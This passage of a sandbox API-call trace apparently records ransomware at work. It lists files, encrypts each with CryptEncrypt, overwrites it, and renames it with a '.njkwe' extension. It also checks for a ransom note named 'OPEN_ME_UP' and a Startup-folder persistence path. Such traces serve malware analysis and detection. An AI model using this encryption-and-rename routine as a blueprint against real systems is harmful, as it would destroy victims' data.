lpOverlapped=0x0) returned 1 [0076.310] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.310] CloseHandle (hObject=0x43c) returned 1 [0076.310] GetProcessHeap () returned 0xbe0000 [0076.310] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.310] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 202 [0076.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\0__connections_cellular_albanian mobile communications (albania)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\0__Connections_Cellular_Albanian Mobile Communications (Albania)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\0__connections_cellular_albanian mobile communications (albania)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.311] GetProcessHeap () returned 0xbe0000 [0076.312] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.312] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90437e87, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90437e87, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90437e87, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x292, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", cAlternateFileName="100__C~1.PRO")) returned 1 [0076.312] lstrcmpiW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.312] lstrcmpiW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.312] lstrcmpiW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.312] lstrcmpiW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.312] lstrcmpiW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.312] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml") returned 162 [0076.312] StrStrIW (lpFirst="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.312] lstrcmpW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.312] lstrcmpW (lpString1="100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.312] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\100__connections_cellular_telia dk (denmark)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.312] GetTickCount () returned 0x11536bc [0076.312] GetTickCount () returned 0x11536bc [0076.312] GetTickCount () returned 0x11536bc [0076.312] GetTickCount () returned 0x11536bc [0076.313] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.313] GetProcessHeap () returned 0xbe0000 [0076.313] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.313] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x292, lpOverlapped=0x0) returned 1 [0076.314] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.314] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x292, lpOverlapped=0x0) returned 1 [0076.314] GetProcessHeap () returned 0xbe0000 [0076.314] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.314] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.314] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.315] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.315] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.315] CloseHandle (hObject=0x43c) returned 1 [0076.315] GetProcessHeap () returned 0xbe0000 [0076.315] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.315] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0076.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\100__connections_cellular_telia dk (denmark)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\100__Connections_Cellular_Telia DK (Denmark)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\100__connections_cellular_telia dk (denmark)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.316] GetProcessHeap () returned 0xbe0000 [0076.316] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.316] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90437e87, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90437e87, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90437e87, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="101__C~1.PRO")) returned 1 [0076.316] lstrcmpiW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.316] lstrcmpiW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.316] lstrcmpiW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.316] lstrcmpiW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.316] lstrcmpiW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.316] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.316] StrStrIW (lpFirst="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.316] lstrcmpW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.316] lstrcmpW (lpString1="101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.316] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.316] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\101__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.316] GetTickCount () returned 0x11536bc [0076.316] GetTickCount () returned 0x11536bc [0076.316] GetTickCount () returned 0x11536bc [0076.316] GetTickCount () returned 0x11536bc [0076.317] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.318] GetProcessHeap () returned 0xbe0000 [0076.318] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.318] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x1d2, lpOverlapped=0x0) returned 1 [0076.319] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.319] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x1d2, lpOverlapped=0x0) returned 1 [0076.319] GetProcessHeap () returned 0xbe0000 [0076.319] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.319] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.319] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.396] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.396] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.396] CloseHandle (hObject=0x43c) returned 1 [0076.396] GetProcessHeap () returned 0xbe0000 [0076.396] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.396] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\101__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\101__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\101__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.398] GetProcessHeap () returned 0xbe0000 [0076.398] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.398] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90437e87, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90437e87, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90437e87, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", cAlternateFileName="102__C~1.PRO")) returned 1 [0076.398] lstrcmpiW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.398] lstrcmpiW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.398] lstrcmpiW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.398] lstrcmpiW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.398] lstrcmpiW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.398] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml") returned 170 [0076.398] StrStrIW (lpFirst="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.398] lstrcmpW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.398] lstrcmpW (lpString1="102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.398] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.398] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\102__connections_cellular_claro (dominican republic)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.399] GetTickCount () returned 0x115370a [0076.399] GetTickCount () returned 0x115370a [0076.399] GetTickCount () returned 0x115370a [0076.399] GetTickCount () returned 0x115370a [0076.399] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.399] GetProcessHeap () returned 0xbe0000 [0076.399] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.399] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0076.403] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.403] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0076.403] GetProcessHeap () returned 0xbe0000 [0076.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.403] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.403] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.403] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.403] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.403] CloseHandle (hObject=0x43c) returned 1 [0076.403] GetProcessHeap () returned 0xbe0000 [0076.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.403] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0076.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\102__connections_cellular_claro (dominican republic)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\102__Connections_Cellular_Claro (Dominican Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\102__connections_cellular_claro (dominican republic)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.404] GetProcessHeap () returned 0xbe0000 [0076.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.404] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9045e0ef, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9045e0ef, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9045e0ef, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x29e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", cAlternateFileName="103__C~1.PRO")) returned 1 [0076.404] lstrcmpiW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.404] lstrcmpiW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.404] lstrcmpiW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.404] lstrcmpiW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.404] lstrcmpiW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.404] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml") returned 170 [0076.404] StrStrIW (lpFirst="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.404] lstrcmpW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.404] lstrcmpW (lpString1="103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.405] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.405] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\103__Connections_Cellular_Claro (Dominican Republic)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\103__connections_cellular_claro (dominican republic)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.405] GetTickCount () returned 0x115371a [0076.405] GetTickCount () returned 0x115371a [0076.405] GetTickCount () returned 0x115371a [0076.405] GetTickCount () returned 0x115371a [0076.405] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.405] GetProcessHeap () returned 0xbe0000 [0076.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.405] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x29e, lpOverlapped=0x0) returned 1 [0076.411] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.411] WriteFile (in: hFile=0x43c, 